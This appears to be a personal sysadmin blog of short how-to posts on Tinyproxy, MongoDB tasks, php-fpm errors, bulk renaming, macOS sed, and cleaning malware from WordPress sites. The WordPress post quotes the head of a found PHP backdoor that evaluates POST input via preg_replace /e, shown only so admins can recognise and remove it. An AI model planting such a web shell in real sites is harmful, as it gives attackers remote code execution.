Install Tinyproxy on CentOS 7

Tinyproxy is a light-weight HTTP/HTTPS proxy daemon for POSIX operating systems.
Designed from the ground up to be fast and yet small, it is an ideal solution for use cases such as embedded deployments where a full featured HTTP proxy is required, but the system resources for a larger proxy are unavailable.

[code lang="shell"]
yum install -y epel-release
yum update -y
yum -y install tinyproxy
yum install vim -y
[/code]

vim /etc/tinyproxy/tinyproxy.conf

Search for the listening port and change it if you want Tinyproxy to listen elsewhere:
[code lang="shell"]
Port 8888
[/code]

Then search for the access rule:
[code lang="shell"]
Allow xxx.xxx.xxx.xxx
[/code]
If you want to allow connections from anywhere, you can just comment this line out, but I don't recommend it, because it will let anyone connect through your proxy.
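As a concrete sketch, the two settings together in /etc/tinyproxy/tinyproxy.conf might look like this (the client IP address below is a placeholder):

[code lang="shell"]
# Port Tinyproxy listens on
Port 8888
# Only this client IP may use the proxy (placeholder address)
Allow 203.0.113.10
[/code]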

To test from the allowed server to the Tinyproxy server:

[code lang="shell"]
ssh [email protected] -L 1234:localhost:8888 -N
[/code]

[code lang="shell"]
curl -I https://juzhax.com/ --proxy [email protected]:8888
[/code]
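If you are testing through the SSH tunnel above instead, point curl at the forwarded local port (1234 in that example):

[code lang="shell"]
curl -I https://juzhax.com/ --proxy 127.0.0.1:1234
[/code]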

mongoexport and mongoimport with a query from one host to another

I wanted to copy only the data I need from one server to another, using a single line of command in the Linux shell:

[code lang="shell"]
mongoexport -h fromHost.com -d fromDB -c fromCollection -q '{ count: { $gte: 1 } }' | mongoimport -h toHost.com -d toNewDB -c toNewCollection
[/code]

If your data is many gigabytes, you can run it in the background using nohup. Note that nohup takes a command, not a quoted string, so the pipeline has to be wrapped in sh -c:
[code lang="shell"]
nohup sh -c "mongoexport -h fromHost.com -d fromDB -c fromCollection -q '{ count: { \$gte: 1 } }' | mongoimport -h toHost.com -d toNewDB -c toNewCollection" &
[/code]

If you want to view the current progress:
[code lang="shell"]
tail -f nohup.out
[/code]
It will output something like:
[code lang="shell"]
2016-05-17T02:34:47.822+0700 imported 1431218 documents
2016-05-17T02:36:40.240+0700 connected to: localhost
2016-05-17T02:36:40.243+0700 connected to: db.fromHost.com
2016-05-17T02:36:41.244+0700 db.collection 1000
2016-05-17T02:36:42.243+0700 db.collection 56000
2016-05-17T02:36:43.239+0700 db.collection0517 11.5 MB
2016-05-17T02:36:43.243+0700 db.collection 88000
2016-05-17T02:36:44.244+0700 db.collection 128000
2016-05-17T02:36:45.243+0700 db.collection 160000
2016-05-17T02:36:46.239+0700 db.collection0517 24.4 MB
…..
…..
[/code]

Fast way to find duplicate data in MongoDB

I need to find the duplicated values among my 40 million records, so that I can then create a unique index on my name field.

[code lang="shell"]
> db.collection.aggregate([
… { $group : {_id : "$field_name", total : { $sum : 1 } } },
… { $match : { total : { $gte : 2 } } },
… { $sort : {total : -1} },
… { $limit : 5 }],
… { allowDiskUse: true}
… );

{ "_id" : "data001", "total" : 2 }
{ "_id" : "data004231", "total" : 2 }
{ "_id" : "data00751", "total" : 2 }
{ "_id" : "data0021", "total" : 2 }
{ "_id" : "data001543", "total" : 2 }
>
[/code]

{ allowDiskUse: true } is optional if your data set is small; for large collections the aggregation needs it to spill to disk.

Increase { $limit : 5 } if you want to display more results.
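Once the duplicates are removed, the unique index mentioned above can be created in the mongo shell; the collection and field names below are the placeholders from the example:

[code lang="shell"]
> db.collection.createIndex( { field_name: 1 }, { unique: true } )
[/code]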

ERROR: failed to ptrace(PEEKDATA) pid 17402: Input/output error (5)

You may find this error in your php-fpm log when php-fpm crashes:

[code lang="shell"]
tail /var/log/php-fpm/error.log
[15-May-2016 12:24:13] ERROR: failed to ptrace(PEEKDATA) pid 17402: Input/output error (5)
[15-May-2016 12:24:13] ERROR: failed to ptrace(PEEKDATA) pid 17777: Input/output error (5)
[15-May-2016 12:24:13] ERROR: failed to ptrace(PEEKDATA) pid 18886: Input/output error (5)
[15-May-2016 12:25:53] ERROR: failed to ptrace(PEEKDATA) pid 17232: Input/output error (5)
[15-May-2016 12:29:13] ERROR: failed to ptrace(PEEKDATA) pid 12091: Input/output error (5)
[15-May-2016 12:29:13] ERROR: failed to ptrace(PEEKDATA) pid 16704: Input/output error (5)
[15-May-2016 12:29:13] ERROR: failed to ptrace(PEEKDATA) pid 17779: Input/output error (5)
[15-May-2016 12:29:13] ERROR: failed to ptrace(PEEKDATA) pid 19015: Input/output error (5)
[15-May-2016 12:30:53] ERROR: failed to ptrace(PEEKDATA) pid 20663: Input/output error (5)
[15-May-2016 12:30:53] ERROR: failed to ptrace(PEEKDATA) pid 21002: Input/output error (5)
[/code]

Solution to stop ERROR: failed to ptrace(PEEKDATA)

You can simply comment out two lines in the php-fpm pool config:
[code lang="shell"]
vim /etc/php-fpm.d/www.conf
[/code]

then comment out these lines:
[code lang="shell"]
;slowlog = /var/log/php-fpm/slow.log
;request_slowlog_timeout = 5s
[/code]
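After editing the pool config, restart php-fpm so the change takes effect (on CentOS 7 with systemd):

[code lang="shell"]
systemctl restart php-fpm
[/code]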

WARNING: /sys/kernel/mm/transparent_hugepage/enabled is 'always'.

After installing MongoDB 3.2.3 on CentOS 7, I received these warnings when starting mongo in the shell:

[code lang="shell"]
[[email protected] ~]# mongo
MongoDB shell version: 3.2.3
connecting to: test
Server has startup warnings:
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten]
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten] ** WARNING: /sys/kernel/mm/transparent_hugepage/enabled is 'always'.
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten] ** We suggest setting it to 'never'
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten]
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten] ** WARNING: /sys/kernel/mm/transparent_hugepage/defrag is 'always'.
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten] ** We suggest setting it to 'never'
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten]
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten] ** WARNING: soft rlimits too low. rlimits set to 4096 processes, 64000 files. Number of processes should be at least 32000 : 0.5 times number of files.
[/code]

Solution

Create the init.d script.
Create the following file at /etc/init.d/disable-transparent-hugepages:

[code lang="shell"]
#!/bin/sh
### BEGIN INIT INFO
# Provides:          disable-transparent-hugepages
# Required-Start:    $local_fs
# Required-Stop:
# X-Start-Before:    mongod mongodb-mms-automation-agent
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Disable Linux transparent huge pages
# Description:       Disable Linux transparent huge pages, to improve
#                    database performance.
### END INIT INFO

case $1 in
start)
  if [ -d /sys/kernel/mm/transparent_hugepage ]; then
    thp_path=/sys/kernel/mm/transparent_hugepage
  elif [ -d /sys/kernel/mm/redhat_transparent_hugepage ]; then
    thp_path=/sys/kernel/mm/redhat_transparent_hugepage
  else
    return 0
  fi

  echo 'never' > ${thp_path}/enabled
  echo 'never' > ${thp_path}/defrag

  unset thp_path
  ;;
esac
[/code]

Make it executable.
Run the following command to ensure that the init script can be used:

[code lang="shell"]
sudo chmod 755 /etc/init.d/disable-transparent-hugepages
[/code]

[code lang="shell"]
sudo chkconfig --add disable-transparent-hugepages
[/code]
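After running the script (or rebooting), you can verify the setting; the value in square brackets is the active one and should be never:

[code lang="shell"]
cat /sys/kernel/mm/transparent_hugepage/enabled
cat /sys/kernel/mm/transparent_hugepage/defrag
[/code]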

WARNING: Cannot detect if NUMA interleaving is enabled. Failed to probe “/sys/devices/system/node/node1”: Permission denied

[code lang="shell"]
[[email protected] ~]# mongo
MongoDB shell version: 3.2.3
connecting to: test
Server has startup warnings:
2016-02-29T23:11:36.666+0700 I CONTROL [initandlisten]
2016-02-29T23:11:36.667+0700 I CONTROL [initandlisten] ** WARNING: Cannot detect if NUMA interleaving is enabled. Failed to probe "/sys/devices/system/node/node1": Permission denied
2016-02-29T23:11:36.667+0700 W CONTROL [initandlisten]
2016-02-29T23:11:36.667+0700 W CONTROL [initandlisten] Failed to probe "/sys/kernel/mm/transparent_hugepage": Permission denied
2016-02-29T23:11:36.667+0700 W CONTROL [initandlisten]
2016-02-29T23:11:36.667+0700 W CONTROL [initandlisten] Failed to probe "/sys/kernel/mm/transparent_hugepage": Permission denied
2016-02-29T23:11:36.667+0700 I CONTROL [initandlisten]
2016-02-29T23:11:36.667+0700 I CONTROL [initandlisten] ** WARNING: soft rlimits too low. rlimits set to 4096 processes, 262144 files. Number of processes should be at least 131072 : 0.5 times number of files.
[/code]

Solution

I was using the OVH kernel, which does not play well with MongoDB. To solve this issue I reinstalled the distribution's original kernel, and the error went away.

Remove WordPress Malware using Linux Shell Console

I run a lot of WordPress sites, and recently a few of my old sites were infected with malware; spammers were using them to send spam email. I would like to share the way I fixed this.

Most spammers look for world-writable (777) paths, most commonly /wp-content/uploads/.
So I scanned all the PHP files they had uploaded there, together with their modification dates:
[code lang="shell"]
find ./public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
[/code]

Then I found these:
[code lang="shell"]
2015-10-16 12:25:01 ./wp-content/uploads/2013/05/blog84.php
2015-10-16 12:25:01 ./wp-content/uploads/2014/10/dump.php
2015-10-16 12:25:01 ./wp-content/uploads/2014/code.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/07/session90.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/09/xml96.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/504.php
2015-10-16 12:25:01 ./wp-content/uploads/about_us.php
2015-10-16 12:25:01 ./wp-content/uploads/contactus.php
2015-10-16 12:25:01 ./wp-content/uploads/rtbwvcsxrnbsvcd.php
2015-10-16 12:25:01 ./wp-content/uploads/sc_afsed.php
2015-10-16 12:25:01 ./wp-content/uploads/team.php
2015-10-16 12:25:01 ./wp-content/uploads/wp-upload.php
[/code]

These kinds of files should be removed; they are what sends the spam.
You can view the head of a file to check whether it is malicious:
[code lang="shell"]
head ./wp-content/uploads/2013/05/blog84.php
[/code]
It will show something like this:
[code lang="shell"]
<?php @preg_replace('/(.*)/e', @$_POST['dnrdztvetxn'], '');
$GLOBALS[‘af4569’] = "\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5
[/code]
You should remove it immediately.
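Besides inspecting files one by one, you can grep the uploads directory for patterns that are common in PHP backdoors; preg_replace with the /e modifier, eval, and base64_decode are frequent suspects. This is only a heuristic sketch (adjust the path to your install), and legitimate plugins occasionally match too:

```shell
# list PHP files under uploads/ that contain common backdoor patterns
grep -rlE 'preg_replace.*/e|eval\(|base64_decode' ./wp-content/uploads/ --include='*.php'
```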

Search Malware files in WordPress

If you are a server admin and want to scan all users, you can try this:
[code lang="shell"]
find /home/*/domains/*/public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
[/code]
or
[code lang="shell"]
find /home/nginx/domains/*/public/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
[/code]

To catch all possible files, I suggest you first upgrade WordPress to the latest version.
Then try:
[code lang="shell"]
find ./public_html -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
[/code]
This lists every PHP file sorted by modification date, so suspicious files stand out and can be removed easily.

Fastest way to rename filenames with spaces to dashes in Linux

I want to mass-rename hundreds of filenames, like
filename 001.jpg to filename-001.jpg
…
filename 099.jpg to filename-099.jpg

I used this command to rename them all in a few seconds on my MacBook Pro.
It should work the same in any Linux shell that supports bash-style substitution.
[code lang="bash"]
for f in *\ *; do mv "$f" "${f// /-}"; done
[/code]
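If you want to preview the result first, prefix the mv with echo for a dry run. A small self-contained sketch in a scratch directory (note that ${f// /-} is a bash/zsh substitution, so run it under bash rather than plain sh):

```shell
# set up a scratch directory with space-containing filenames
mkdir -p /tmp/rename-demo && cd /tmp/rename-demo
touch "filename 001.jpg" "filename 002.jpg"

# dry run: print the renames without performing them
for f in *\ *; do echo mv "$f" "${f// /-}"; done

# do it for real
for f in *\ *; do mv "$f" "${f// /-}"; done
```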

sed: "command c expects \ followed by text" error on Mac

You get this error from the sed command on macOS because BSD sed interprets the -i argument differently from GNU sed.
If you type the usual GNU-style command in a Mac terminal, you may receive an error like this:
[code lang="bash"]
Justins-MacBook-Pro:2 juzhax$ sed -i 's/old_text/new_text/g' example.txt
sed: 1: "config.php": command c expects \ followed by text
[/code]

On macOS, the first argument after -i must be the suffix for the backup file. The correct way is:
[code lang="bash"]
Justins-MacBook-Pro:2 juzhax$ sed -i '.bak' 's/old_text/new_text/g' example.txt
[/code]

or

[code lang="bash"]
Justins-MacBook-Pro:2 juzhax$ sed -i '.original' 's/old_text/new_text/g' example.txt
[/code]

If you don't want any backup file, pass an empty suffix:
[code lang="bash"]
Justins-MacBook-Pro:2 juzhax$ sed -i '' 's/old_text/new_text/g' example.txt
[/code]
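As a portable middle ground, attaching the suffix directly to -i with no space works with both GNU sed on Linux and BSD sed on macOS. A quick self-contained sketch:

```shell
# create a sample file
printf 'old_text here\n' > /tmp/example.txt

# edit in place, keeping /tmp/example.txt.bak as a backup; works on Linux and macOS
sed -i.bak 's/old_text/new_text/g' /tmp/example.txt

cat /tmp/example.txt       # now contains: new_text here
cat /tmp/example.txt.bak   # backup keeps:  old_text here
```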